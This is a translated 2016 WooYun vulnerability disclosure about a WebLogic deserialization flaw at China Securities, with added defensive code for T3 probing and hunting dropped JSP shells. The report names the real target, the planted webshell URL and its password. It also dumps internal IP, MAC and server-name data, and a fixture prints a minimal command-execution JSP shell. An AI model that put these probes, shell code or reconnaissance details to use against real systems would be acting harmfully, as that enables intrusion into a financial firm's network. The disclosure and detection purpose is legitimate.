A system at 中信建投证券 (China Securities) has a deserialization command execution vulnerability; a shell was obtained and the internal network is exposed

ID: 222276
URL: http://www.wooyun.org/bug.php?action=view&id=222276
Status: fixed by vendor
Title: A system at 中信建投证券 (China Securities) has a deserialization command execution vulnerability; a shell was obtained and the internal network is exposed
Type: command execution
Vendor: csc108.com
White hat: 路人甲 (anonymous)
Submitted: 2016-06-23 10:17:00
Published: 2016-07-05 13:57:00
Fixed: 2016-07-05 13:57:00
Confirmed: 2016-06-23 00:00:00
Confirm Spend: 0
Tags:
Followers: 0
Favorites: 0
White hat rating:
White hat self-assessed rank: 20
Vendor rating:
Vendor-assessed rank: 10
Summary:
WebLogic deserialization command execution
Details:

The Struts2 (st2) command execution vulnerability has not been fixed either:
http://yfpt.csc.com.cn:8080/km/login.dhtml

[Screenshot: QQ截图20160623095558.png]


http://yfpt.csc.com.cn:8080
has a WebLogic deserialization command execution vulnerability.
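The WebLogic deserialization bugs of this era are reached over the T3 protocol, which WebLogic multiplexes on the same listen port as HTTP, so a host serving HTTP on 8080 may also accept T3 on 8080. The following is an added example (not the reporter's code) that does the one safe check a practitioner wants before anything else: send the T3 greeting and see whether the server answers with a T3 `HELO`, which also leaks the server version. It only tells you that T3 is exposed, not whether the server is patched; host, port and the sample response below are placeholders, not the target on this page.

```python
"""Fingerprint a WebLogic T3 listener (added example, not from the page).

WebLogic's T3 handshake is a small text exchange: the client sends
"t3 <version>" plus AS/HL headers, and a T3-capable server answers
"HELO:<version>.<ssl-flag>" followed by its own headers.
"""
import re
import socket
import sys

# Client greeting: protocol + version, abbreviation size (AS) and header length (HL).
T3_HELLO = b"t3 12.2.1\nAS:255\nHL:19\n\n"

# Server reply looks like b"HELO:10.3.6.0.false\nAS:2048\nHL:19\nMS:10000000\n\n".
HELO_RE = re.compile(rb"^HELO:(?P<version>[\d.]+)\.(?P<ssl>true|false)")


def parse_t3_hello(data: bytes):
    """Return (server_version, ssl_enabled) if `data` is a T3 HELO reply, else None.

    Anything else (an HTTP 400 from a plain web server, a closed socket, an
    "LGIN"/"UNAV" style refusal) yields None: the port does not speak T3 to us.
    """
    m = HELO_RE.match(data)
    if not m:
        return None
    return m.group("version").decode("ascii"), m.group("ssl") == b"true"


def probe_t3(host: str, port: int, timeout: float = 5.0):
    """Open a TCP connection, send the T3 greeting and parse whatever comes back."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(T3_HELLO)
        try:
            data = s.recv(1024)
        except socket.timeout:
            return None
    return parse_t3_hello(data)


if __name__ == "__main__":
    # Usage: python t3probe.py <host> <port>   (host/port are yours, not the page's)
    target_host, target_port = sys.argv[1], int(sys.argv[2])
    result = probe_t3(target_host, target_port)
    if result is None:
        print("no T3 HELO: port does not expose T3 (or blocked)")
    else:
        version, ssl_on = result
        print(f"T3 exposed, WebLogic {version}, ssl={'on' if ssl_on else 'off'}")
```

A `HELO` reply means the deserialization entry point is reachable from where you are standing; whether it is exploitable depends on the patch level, which the version string only hints at. The same probe, run from the DMZ and from the internet, is also the quickest way to confirm a fix that consists of firewalling T3 rather than patching.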

[Screenshot: QQ截图20160623100553.png]


[Screenshot: QQ截图20160623100632.png]

POC

A large amount of internal network information (Windows `arp -a` and `net view` output from the compromised host):

Interface: 10.101.28.201 --- 0x10004
  Internet Address      Physical Address      Type
10.101.28.4 00-00-0c-07-ac-04 dynamic
10.101.28.5 00-25-b4-db-96-80 dynamic
10.101.28.6 00-25-b4-db-96-40 dynamic
10.101.28.16 a4-ba-db-4d-19-21 dynamic
10.101.28.20 54-9f-35-22-32-40 dynamic
10.101.28.80 00-26-b9-47-fd-b3 dynamic
10.101.28.81 00-26-b9-47-fa-5d dynamic
10.101.28.116 84-2b-2b-76-72-e2 dynamic
10.101.28.132 00-50-56-ba-4d-c0 dynamic
10.101.28.158 00-50-56-ba-05-a7 dynamic
10.101.28.200 84-2b-2b-5c-39-49 dynamic
10.101.28.218 00-21-97-01-23-fc dynamic
10.101.28.223 00-17-08-58-56-3c dynamic
10.101.28.228 00-10-db-ff-20-00 dynamic
10.101.28.230 00-1b-78-ca-dd-02 dynamic
10.101.28.231 00-50-56-ba-3d-80 dynamic
10.101.29.25 00-22-19-6a-89-95 dynamic
10.101.29.144 00-1e-0b-1f-b5-da dynamic


Server Name            Remark
-------------------------------------------------------------------------------
\\CC-OA-ISABY
\\CSC-FINANCE6
\\CSC_FINANCE3
\\CSC_FINANCE5
\\CSCBJ_MAIL
\\CSCBJ_NOTES
\\JF-AD3
\\JF-ALDBY
\\JF-ALDZY
\\JF-ALGO-CALC1
\\JF-ALGO-CALC2
\\JF-ALGO-ENGINE1
\\JF-ALGO-ENGINE2 jf-algo-engine2
\\JF-AUDIT-WEB4
\\JF-AUTO-OP
\\JF-AUTO-YYB
\\JF-AUTOCENTRWEB
\\JF-CA
\\JF-CALL-CCSBJ
\\JF-CALL-CCXPBY
\\JF-CALL-CCXPZY
\\JF-CALL-JIGOU
\\JF-CALL-XPMID1
\\JF-CALL-XPMID2
\\JF-CERT-YGS1
\\JF-CERT-YGS2
\\JF-CERT-YGS3
\\JF-CITRIX-BJ1
\\JF-CITRIX-BJ3
\\JF-DUANXIN-144
\\JF-DUANXIN-145
\\JF-DUANXIN-146
\\JF-DUANXIN-248
\\JF-DUANXIN-DB1
\\JF-DUANXIN-ZYDB
\\JF-DZJY-SZ
\\JF-EPOSERVER
\\JF-HESUAN-NET1
\\JF-HQ-108HQ
\\JF-HQ-DATA
\\JF-HQ-FHSERVER
\\JF-HQ-HHHQ
\\JF-HQ-SHVLAN4
\\JF-HQ-SZVLAN4
\\JF-HQ-UCTVLAN4
\\JF-INFO-GA
\\JF-INFO-GABAK
\\JF-JC-MID
\\JF-JFJKBY
\\JF-JFJKZY
\\JF-JZ-MONITOR
\\JF-KDS28
\\JF-MFB-YWJ
\\JF-OA-NOTES3 jf-oa-notes3
\\JF-OF-SVR1
\\JF-QH-POBOPTBY jf-qh-poboptby
\\JF-QH-POBOPTZY jf-qh-poboptzy
\\JF-SC-FILETRANS
\\JF-SCOM
\\JF-SCOM1
\\JF-SJCJ-11
\\JF-SJCJ-50
\\JF-SJZX-BB
\\JF-SJZX-SIPF1
\\JF-SOLARWINDS
\\JF-TAPEBACK-1
\\JF-TAPEBACK-2
\\JF-TAPEBACK-3
\\JF-TS-APPL
\\JF-TS-DB
\\JF-TS-GATE
\\JF-TS-GATE1
\\JF-TS-GATE2
\\JF-TS-JYGWBY
\\JF-TS-JYGWZY
\\JF-V-AUTODB
\\JF-V-AUTOJOBWEB
\\JF-WEB-DB
\\JF-WEB-T3
\\JF-WEB-T7
\\JF-WEB-T8
\\JF-WEB-T9
\\JF-WEBJY-006 jf-webjy-006
\\JF-WEBJY-108MS1
\\JF-WEBJY-108MS2
\\JF-WEBJY-140
\\JF-WEBJY-CENTER
\\JF-WEBJY-HQSEND
\\JF-WEBJY-IP
\\JF-WEBJY-LOG
\\JF-WEBJY-MID149
\\JF-WEBJY-MID47
\\JF-WX-SQL
\\JF-XWGL-DBBY
\\JF-XWGL-DBZY
\\JF-YF-ZSGL2
\\JF-YF-ZSGL3
\\JF-YXXT-01
\\JF-YXXT-02
\\JF-YXXT-03
\\JF-YXXT-04
\\JF-YXXT-05
\\JF-YXXT-06
\\JF-ZBYXHC
\\JF-ZCGL-GZDB0
\\JF-ZCGL-GZDB1
\\JF-ZCGL-TADB0
\\JF-ZCGL-TADB1
\\ZXJT-AY27IMKPBR
The command completed successfully.


After finding the absolute path, write the shell into the staged uddiexplorer WAR directory:
D:/weblogic_domains/base_domain/servers/YfptServer/tmp/_WL_internal/uddiexplorer/hys9u6/war
http://yfpt.csc.com.cn:8080/uddiexplorer/wooyun.jsp?o=vLogin
Password: ninty

[Screenshot: QQ截图20160623101034.png]


A large amount of internal information:

[Screenshot: QQ截图20160623101133.png]

Fix:

Apply the patch and delete the shell.
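Deleting the one shell you know about is not the same as checking that no other was dropped. The shell on this page lived under `servers/<name>/tmp/_WL_internal/`, the directory where WebLogic extracts deployed WARs, so a JSP there that the WAR never contained is the thing to hunt for. Below is an added example (not the reporter's or the vendor's code) that walks a domain directory and flags JSPs in that staging tree whose source carries typical shell markers. The sample domain it builds, including the file body it gives `wooyun.jsp`, is constructed for the demonstration; only the directory layout and server name come from the path on the page.

```python
"""Hunt for dropped JSP shells under a WebLogic domain's staging tree.

Added example for this page. Marker matching is a heuristic: a hit means
"read this file", a miss does not prove the tree is clean (obfuscated or
binary-only shells will not match). Pair it with a comparison of each staged
directory against the WAR it was extracted from.
"""
import os
import tempfile

# Source-level strings that legitimate UI JSPs essentially never contain.
SHELL_MARKERS = (
    "Runtime.getRuntime().exec",
    "ProcessBuilder(",
    "defineClass(",
    "URLClassLoader(",
)


def suspicious_markers(path):
    """Return the list of SHELL_MARKERS found in the file at `path`."""
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        src = f.read()
    return [m for m in SHELL_MARKERS if m in src]


def scan_domain(domain_dir):
    """Scan every servers/<server>/tmp/_WL_internal/ tree under `domain_dir`.

    Returns {relative_path: [markers]} for each .jsp/.jspx that matched,
    paths normalised to forward slashes so results compare the same on
    Windows and Unix.
    """
    hits = {}
    servers_dir = os.path.join(domain_dir, "servers")
    if not os.path.isdir(servers_dir):
        return hits
    for server in sorted(os.listdir(servers_dir)):
        staging = os.path.join(servers_dir, server, "tmp", "_WL_internal")
        # os.walk on a missing staging dir simply yields nothing.
        for root, _dirs, files in os.walk(staging):
            for name in files:
                if not name.lower().endswith((".jsp", ".jspx")):
                    continue
                full = os.path.join(root, name)
                found = suspicious_markers(full)
                if found:
                    rel = os.path.relpath(full, domain_dir).replace(os.sep, "/")
                    hits[rel] = found
    return hits


def build_sample_domain():
    """Constructed fixture (not real data): one benign JSP and one shell-like JSP
    in a staging directory laid out like the path on the page."""
    domain = tempfile.mkdtemp(prefix="base_domain_")
    war = os.path.join(domain, "servers", "YfptServer", "tmp", "_WL_internal",
                       "uddiexplorer", "hys9u6", "war")
    os.makedirs(war)
    with open(os.path.join(war, "index.jsp"), "w", encoding="utf-8") as f:
        f.write('<%@ page contentType="text/html" %><html><body>UDDI Explorer</body></html>\n')
    # File name taken from the page; the body is an invented minimal stand-in.
    with open(os.path.join(war, "wooyun.jsp"), "w", encoding="utf-8") as f:
        f.write('<% String c = request.getParameter("cmd");\n'
                '   Runtime.getRuntime().exec(c); %>\n')
    return domain


if __name__ == "__main__":
    # Usage: python hunt_jsp.py [domain_dir]; with no argument, scans the fixture.
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_domain()
    for rel, markers in scan_domain(target).items():
        print(f"{rel}: {', '.join(markers)}")
```

Run it against `D:/weblogic_domains/base_domain` on the affected host (and on every other server in the domain, since T3 reaches all of them). Anything it lists under a staged WAR that is not in the deployed archive is a shell to remove, and its mtime gives you the earliest point to scope the incident from.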

Status history: 2016-06-23: details sent to the vendor, awaiting vendor handling
2016-06-23: vendor confirmed; details disclosed to the vendor only
2016-07-03: details disclosed to core white hats and domain experts
2016-07-05: vendor fixed the vulnerability and disclosed it proactively; details made public
Vendor reply: under confirmation
Response: Severity: Medium; Vulnerability Rank: 10; Confirmed: 2016-06-23 11:35